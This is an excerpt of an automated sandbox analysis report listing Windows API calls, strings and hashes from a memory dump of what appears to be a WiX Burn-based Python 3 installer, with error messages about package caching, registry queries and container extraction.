                                                                                                                                  • _free.LIBCMT ref: 004B8A92
                                                                                                                                  • _free.LIBCMT ref: 004B8A9D
                                                                                                                                  • _free.LIBCMT ref: 004B8AA8
                                                                                                                                  • _free.LIBCMT ref: 004B8AB3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  • Opcode ID: 168201354b2e5533fa0f7f046aa2c7ffc8fc0175796946e774c258da5b176dd2
                                                                                                                                  • Instruction ID: f2f47255038c893fb51098f87662c2d7b4c71e45503b4d26cae9229269a625cf
                                                                                                                                  • Opcode Fuzzy Hash: 168201354b2e5533fa0f7f046aa2c7ffc8fc0175796946e774c258da5b176dd2
                                                                                                                                  • Instruction Fuzzy Hash: 3D114AB1541B04AAD930BBB7CC07FDB77AC5F40704F40482EB69A66053DA3CB506866A
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00483A1A: GetProcessHeap.KERNEL32(?,000001C7,?,004823A7,?,00000001,80004005,8007139F,?,?,004C0687,8007139F,?,00000000,00000000,8007139F), ref: 00483A2B
                                                                                                                                    • Part of subcall function 00483A1A: RtlAllocateHeap.NTDLL(00000000,?,004823A7,?,00000001,80004005,8007139F,?,?,004C0687,8007139F,?,00000000,00000000,8007139F), ref: 00483A32
                                                                                                                                  • _memcpy_s.LIBCMT ref: 0049470C
                                                                                                                                  • _memcpy_s.LIBCMT ref: 0049471F
                                                                                                                                  • _memcpy_s.LIBCMT ref: 0049473A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memcpy_s$Heap$AllocateProcess
                                                                                                                                  • String ID: Failed to allocate memory for message.$c:\agent\_work\138\s\src\burn\engine\pipe.cpp$crypt32.dll
                                                                                                                                  • API String ID: 886498622-4121836808
                                                                                                                                  • Opcode ID: 16eebd96b42b479df1a52418e834ea4bca80e1c2125e46590ab3ad0883d69e42
                                                                                                                                  • Instruction ID: cea6c83e9042c207c036515e8655dcda39270710fb092a9f6019cb68377ee8fd
                                                                                                                                  • Opcode Fuzzy Hash: 16eebd96b42b479df1a52418e834ea4bca80e1c2125e46590ab3ad0883d69e42
                                                                                                                                  • Instruction Fuzzy Hash: 4F118FB750020EABDB01EE91DC82DEB77ACEF44B04B00456BFA11DB241D778DA1487A8
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,004B453A,?,?,004B4502,00000000,80004004,?), ref: 004B455A
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004B456D
                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,004B453A,?,?,004B4502,00000000,80004004,?), ref: 004B4590
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                  • String ID: CorExitProcess$HJ$mscoree.dll
                                                                                                                                  • API String ID: 4061214504-2124872936
                                                                                                                                  • Opcode ID: 5baaac9f0812dbfafb7754acd08d824616730944d2ec4de63738f73c7bbae07a
                                                                                                                                  • Instruction ID: ad86e78096620d0cf14f0eab37271e8ae178dcf29a923d7b9272830fa583cdf7
                                                                                                                                  • Opcode Fuzzy Hash: 5baaac9f0812dbfafb7754acd08d824616730944d2ec4de63738f73c7bbae07a
                                                                                                                                  • Instruction Fuzzy Hash: 17F08231940658FBDB219BA1DC0AFEE7B68EB407A2F140161FD04A2260DF784F00DAD8
                                                                                                                                  APIs
                                                                                                                                  • Sleep.KERNEL32(000007D0,00000000,00000000), ref: 00498CF8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Sleep
                                                                                                                                  • String ID: Failed to calculate cache path.$Failed to get %hs package cache root directory.$Failed to get old %hs package cache root directory.$per-machine$per-user
                                                                                                                                  • API String ID: 3472027048-398165853
                                                                                                                                  • Opcode ID: 0e12e19fc2f1dc2a9ca7b87b35d74a197c2d51da6ffcac55c00d5c858740793d
                                                                                                                                  • Instruction ID: d26646c9185e4032581e4cb66770d45022b4ee64705d51b93019ea17b620469e
                                                                                                                                  • Opcode Fuzzy Hash: 0e12e19fc2f1dc2a9ca7b87b35d74a197c2d51da6ffcac55c00d5c858740793d
                                                                                                                                  • Instruction Fuzzy Hash: DB31F672A00214BBEF11AA588C42F7F6A6C9F22714F21053FFD01F6281DB7D9D0052AD
                                                                                                                                  APIs
                                                                                                                                  • DefWindowProcW.USER32(?,00000082,?,?), ref: 0049E8EA
                                                                                                                                  • SetWindowLongW.USER32(?,000000EB,00000000), ref: 0049E8F9
                                                                                                                                  • SetWindowLongW.USER32(?,000000EB,?), ref: 0049E90D
                                                                                                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 0049E91D
                                                                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 0049E937
                                                                                                                                  • PostQuitMessage.USER32(00000000), ref: 0049E996
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Long$Proc$MessagePostQuit
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3812958022-0
                                                                                                                                  • Opcode ID: 41e3466c15bafaf15ac1e6d8f4144efbb549e7fb971ba2e027af85420a18a951
                                                                                                                                  • Instruction ID: bfe5b10d61edd6813e1917d40e526f463137d9d68f98d024ed1b24a78800d2d6
                                                                                                                                  • Opcode Fuzzy Hash: 41e3466c15bafaf15ac1e6d8f4144efbb549e7fb971ba2e027af85420a18a951
                                                                                                                                  • Instruction Fuzzy Hash: E921FF76100208BFCF419F69DC49E6A3F6AEF05311F14423AFA0AAA2B1C735DD10DBA5
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  • Unexpected elevated message sent to child process, msg: %u, xrefs: 0049C974
                                                                                                                                  • Failed to save state., xrefs: 0049C841
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\elevation.cpp, xrefs: 0049C968
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseHandleMutexRelease
                                                                                                                                  • String ID: Failed to save state.$Unexpected elevated message sent to child process, msg: %u$c:\agent\_work\138\s\src\burn\engine\elevation.cpp
                                                                                                                                  • API String ID: 4207627910-1950014664
                                                                                                                                  • Opcode ID: 34833356be4351c8063086efee9e7e790d4db3994de0c4757e5db935504608bc
                                                                                                                                  • Instruction ID: ff201ccea82b47e65358f680f12b294cebfa24f5a4874cae883d48727992aef2
                                                                                                                                  • Opcode Fuzzy Hash: 34833356be4351c8063086efee9e7e790d4db3994de0c4757e5db935504608bc
                                                                                                                                  • Instruction Fuzzy Hash: AA61E77A104540EFCF125F85CD41D55BFB2FF08314711846AFAA94A632C736E921EF89
                                                                                                                                  APIs
                                                                                                                                  • RegQueryValueExW.ADVAPI32(00000000,000002C0,00000000,000002C0,00000000,00000000,000002C0,BundleUpgradeCode,00000410,000002C0,00000000,00000000,00000000,00000100,00000000), ref: 004C16EF
                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,004970CF,00000100,000000B0,00000088,00000410,000002C0), ref: 004C1726
                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,00000000,?,-00000001,00000004,00000000), ref: 004C1818
                                                                                                                                  Strings
                                                                                                                                  • BundleUpgradeCode, xrefs: 004C16CE
                                                                                                                                  • c:\agent\_work\138\s\src\libs\dutil\regutil.cpp, xrefs: 004C1769
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: QueryValue$lstrlen
                                                                                                                                  • String ID: BundleUpgradeCode$c:\agent\_work\138\s\src\libs\dutil\regutil.cpp
                                                                                                                                  • API String ID: 3790715954-4149154654
                                                                                                                                  • Opcode ID: 740d741997a6aa16ecbb2adb59b859110050a796144bab9e97fe59d8e5c05731
                                                                                                                                  • Instruction ID: 29e3497d5c10493c7a81cce59c9337a92e3a5d0a8a0e7e83eb72db13a7afb02b
                                                                                                                                  • Opcode Fuzzy Hash: 740d741997a6aa16ecbb2adb59b859110050a796144bab9e97fe59d8e5c05731
                                                                                                                                  • Instruction Fuzzy Hash: 7041B639D0511AABCB15AF95C880FAE77B9EF02710F55406EFD01AB321D638DD01CBA8
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 004C4D47: SetFilePointerEx.KERNEL32(?,?,?,?,?,00000000,?,?,?,00498758,00000000,00000000,00000000,00000000,00000000), ref: 004C4D5F
                                                                                                                                    • Part of subcall function 004C4D47: GetLastError.KERNEL32(?,?,?,00498758,00000000,00000000,00000000,00000000,00000000), ref: 004C4D69
                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,004C6017,?,?,?,?,?,?,?,00010000,?), ref: 004C67C6
                                                                                                                                  • WriteFile.KERNEL32(000000FF,00000008,00000008,?,00000000,000000FF,00000000,00000000,00000000,00000000,?,004C6017,?,?,?,?), ref: 004C6818
                                                                                                                                  • GetLastError.KERNEL32(?,004C6017,?,?,?,?,?,?,?,00010000,?,00000001,?,GET,?,?), ref: 004C685E
                                                                                                                                  • GetLastError.KERNEL32(?,004C6017,?,?,?,?,?,?,?,00010000,?,00000001,?,GET,?,?), ref: 004C6884
                                                                                                                                  Strings
                                                                                                                                  • c:\agent\_work\138\s\src\libs\dutil\dlutil.cpp, xrefs: 004C68A8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLast$Write$Pointer
                                                                                                                                  • String ID: c:\agent\_work\138\s\src\libs\dutil\dlutil.cpp
                                                                                                                                  • API String ID: 133221148-3549464317
                                                                                                                                  • Opcode ID: 3cc9c093ef547f4fe42e9b379c9958984fbce0792c67ed16fc26d0f7df66cc1d
                                                                                                                                  • Instruction ID: b8570151da9ea81d7e33b9d187cf1912fe58c1ac40fa05b552932a280f56860e
                                                                                                                                  • Opcode Fuzzy Hash: 3cc9c093ef547f4fe42e9b379c9958984fbce0792c67ed16fc26d0f7df66cc1d
                                                                                                                                  • Instruction Fuzzy Hash: 6A41CF76901219BFEB61AE94CC45FAB7B68FF04354F16812AFD00A6190D738DD50CBB8
                                                                                                                                  APIs
                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,004C0406,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,004C0406,004A1188,?,00000000), ref: 0048259F
                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,004C0406,004A1188,?,00000000,0000FDE9,?,004A1188), ref: 004825AB
                                                                                                                                    • Part of subcall function 00483C9A: GetProcessHeap.KERNEL32(00000000,000001C7,?,00482300,000001C7,80004005,8007139F,?,?,004C0687,8007139F,?,00000000,00000000,8007139F), ref: 00483CA2
                                                                                                                                    • Part of subcall function 00483C9A: HeapSize.KERNEL32(00000000,?,00482300,000001C7,80004005,8007139F,?,?,004C0687,8007139F,?,00000000,00000000,8007139F), ref: 00483CA9
                                                                                                                                  Strings
                                                                                                                                  • c:\agent\_work\138\s\src\libs\dutil\strutil.cpp, xrefs: 004825CF
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$ByteCharErrorLastMultiProcessSizeWide
                                                                                                                                  • String ID: c:\agent\_work\138\s\src\libs\dutil\strutil.cpp
                                                                                                                                  • API String ID: 3662877508-1498286024
                                                                                                                                  • Opcode ID: fe8a2ba83007d8346e379a804f3bf9ca82362b53a265ede00d6097e97c75edd5
                                                                                                                                  • Instruction ID: 9cd4f2a64fc98a951ae44d8fcbef9c094f6fbadd7967e58e638e65f4662d0478
                                                                                                                                  • Opcode Fuzzy Hash: fe8a2ba83007d8346e379a804f3bf9ca82362b53a265ede00d6097e97c75edd5
                                                                                                                                  • Instruction Fuzzy Hash: 18311A71240306BFE7107E658DD0E7F32D9EB14368B104A2BFD11AB290EBB9CC0197A9
                                                                                                                                  APIs
                                                                                                                                  • MoveFileExW.KERNEL32(00000003,00000001,00000000,00000000,00000101,?,004C477B,00000003,00000001,00000001,000007D0,00000003,00000000,?,0049A040,00000001), ref: 004C464B
                                                                                                                                  • GetLastError.KERNEL32(00000002,?,004C477B,00000003,00000001,00000001,000007D0,00000003,00000000,?,0049A040,00000001,000007D0,00000001,00000001,00000003), ref: 004C465A
                                                                                                                                  • MoveFileExW.KERNEL32(00000003,00000001,00000000,00000001,00000000,?,004C477B,00000003,00000001,00000001,000007D0,00000003,00000000,?,0049A040,00000001), ref: 004C46F3
                                                                                                                                  • GetLastError.KERNEL32(?,004C477B,00000003,00000001,00000001,000007D0,00000003,00000000,?,0049A040,00000001,000007D0,00000001,00000001,00000003,000007D0), ref: 004C46FD
                                                                                                                                    • Part of subcall function 004C488B: FindFirstFileW.KERNEL32(004A907E,?,00000100,00000000,00000000), ref: 004C48C6
                                                                                                                                    • Part of subcall function 004C488B: FindClose.KERNEL32(00000000), ref: 004C48D2
                                                                                                                                  Strings
                                                                                                                                  • c:\agent\_work\138\s\src\libs\dutil\fileutil.cpp, xrefs: 004C471C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$ErrorFindLastMove$CloseFirst
                                                                                                                                  • String ID: c:\agent\_work\138\s\src\libs\dutil\fileutil.cpp
                                                                                                                                  • API String ID: 3479031965-3168567549
                                                                                                                                  • Opcode ID: 36b18d8c125bc84bc4caa0ef03b81d3ec42fdea5271f39f74c20e20fb215a36a
                                                                                                                                  • Instruction ID: 0820ebb00005f17c57b2d2fce5fbbd80822496c42aa337bda8f6cacb218eb546
                                                                                                                                  • Opcode Fuzzy Hash: 36b18d8c125bc84bc4caa0ef03b81d3ec42fdea5271f39f74c20e20fb215a36a
                                                                                                                                  • Instruction Fuzzy Hash: 9B31323EA022619BCB611E559D65F7B76A5EFC2BA1F16402FFC049B340C73C8C4186D8
                                                                                                                                  APIs
                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,?,000000FF,?,00000000,?,?,?,00000000,00000000,?,?,00000000), ref: 004AABC3
                                                                                                                                  Strings
                                                                                                                                  • Failed to extract payload: %ls from container: %ls, xrefs: 004AAC4C
                                                                                                                                  • Failed to skip the extraction of payload: %ls from container: %ls, xrefs: 004AAC58
                                                                                                                                  • Failed to open container: %ls., xrefs: 004AAB95
                                                                                                                                  • Failed to extract all payloads from container: %ls, xrefs: 004AAC07
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CompareString
                                                                                                                                  • String ID: Failed to extract all payloads from container: %ls$Failed to extract payload: %ls from container: %ls$Failed to open container: %ls.$Failed to skip the extraction of payload: %ls from container: %ls
                                                                                                                                  • API String ID: 1825529933-3891707333
                                                                                                                                  • Opcode ID: 7dd920b8215d71ed696ba1cb8b3a29b1249d4bf1236dad3138ef8ad654ce44b0
                                                                                                                                  • Instruction ID: 6a56de1be3fcc6336b04acad444e636e376469a956b06a09b7ff526de625de79
                                                                                                                                  • Opcode Fuzzy Hash: 7dd920b8215d71ed696ba1cb8b3a29b1249d4bf1236dad3138ef8ad654ce44b0
                                                                                                                                  • Instruction Fuzzy Hash: 4E310732D00119FBCF21AAD5CC46E8E7769AF15324F200517FE11A7191E339EA25D7AA
                                                                                                                                  APIs
                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,00000001,000000FF,?,000000FF,00000001,PackageVersion,00000001,?,004906D8,00000001,00000001,00000001,004906D8,00000000), ref: 0048F11C
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000001,PackageVersion,00000001,?,004906D8,00000001,00000001,00000001,004906D8,00000000,00000001,00000000,?,004906D8,00000001), ref: 0048F139
                                                                                                                                  Strings
                                                                                                                                  • Failed to remove update registration key: %ls, xrefs: 0048F164
                                                                                                                                  • Failed to format key for update registration., xrefs: 0048F0D2
                                                                                                                                  • PackageVersion, xrefs: 0048F0FD
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCompareString
                                                                                                                                  • String ID: Failed to format key for update registration.$Failed to remove update registration key: %ls$PackageVersion
                                                                                                                                  • API String ID: 446873843-3222553582
                                                                                                                                  • Opcode ID: b539be5c6eed038ad3ef4cb82ed9355a6698a631a632c8f68bbb37451017035e
                                                                                                                                  • Instruction ID: 70976c68482a1668da30aed94a63afcd9f28224adbf5050ca0a9dfbf3885ae0d
                                                                                                                                  • Opcode Fuzzy Hash: b539be5c6eed038ad3ef4cb82ed9355a6698a631a632c8f68bbb37451017035e
                                                                                                                                  • Instruction Fuzzy Hash: 0D21B431900124FBCB51ABA6CD09F9FBAB8DF51724F10457BF811A2251D7794E019BD8
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 004C488B: FindFirstFileW.KERNEL32(004A907E,?,00000100,00000000,00000000), ref: 004C48C6
                                                                                                                                    • Part of subcall function 004C488B: FindClose.KERNEL32(00000000), ref: 004C48D2
                                                                                                                                  • RegCloseKey.ADVAPI32(?,00000000,?,00000000,?,00000000,?,00000000,?,wininet.dll,?,crypt32.dll,?,?,?,00000000), ref: 004C487D
                                                                                                                                    • Part of subcall function 004C1436: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,004EBB7C,00000000,?,004C5BF9,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 004C144A
                                                                                                                                    • Part of subcall function 004C16C7: RegQueryValueExW.ADVAPI32(00000000,000002C0,00000000,000002C0,00000000,00000000,000002C0,BundleUpgradeCode,00000410,000002C0,00000000,00000000,00000000,00000100,00000000), ref: 004C16EF
                                                                                                                                    • Part of subcall function 004C16C7: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,004970CF,00000100,000000B0,00000088,00000410,000002C0), ref: 004C1726
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseFindQueryValue$FileFirstOpen
                                                                                                                                  • String ID: PendingFileRenameOperations$SYSTEM\CurrentControlSet\Control\Session Manager$\$crypt32.dll
                                                                                                                                  • API String ID: 3397690329-3978359083
                                                                                                                                  • Opcode ID: 955fc7a4c6130ec762e24d9a166d30ddba62e5799889ae9cfd1d6487e7f58d43
                                                                                                                                  • Instruction ID: e4f6fca13886e83ff74a360cfdc8b825838fa67a980aba31b81400e53e6dafca
                                                                                                                                  • Opcode Fuzzy Hash: 955fc7a4c6130ec762e24d9a166d30ddba62e5799889ae9cfd1d6487e7f58d43
                                                                                                                                  • Instruction Fuzzy Hash: 76318F3D900259EADFA1BF928A51EAEB775EF80760F54846FE500A6251D3389A40CB78
                                                                                                                                  APIs
                                                                                                                                  • CopyFileW.KERNEL32(00000000,?,00000000,?,?,00000000,?,004C4577,00000000,?,00000000,00000000,8NH,004985D8,004CB4D8,004CB4F0), ref: 004C4476
                                                                                                                                  • GetLastError.KERNEL32(?,004C4577,00000000,?,00000000,00000000,8NH,004985D8,004CB4D8,004CB4F0,00000001,00000003,000007D0,004CB508,?,crypt32.dll), ref: 004C4484
                                                                                                                                  • CopyFileW.KERNEL32(00000000,?,00000000,?,00000000,?,004C4577,00000000,?,00000000,00000000,8NH,004985D8,004CB4D8,004CB4F0,00000001), ref: 004C44F6
                                                                                                                                  • GetLastError.KERNEL32(?,004C4577,00000000,?,00000000,00000000,8NH,004985D8,004CB4D8,004CB4F0,00000001,00000003,000007D0,004CB508,?,crypt32.dll), ref: 004C4500
                                                                                                                                  Strings
                                                                                                                                  • c:\agent\_work\138\s\src\libs\dutil\fileutil.cpp, xrefs: 004C451F
                                                                                                                                  Memory Dump Source
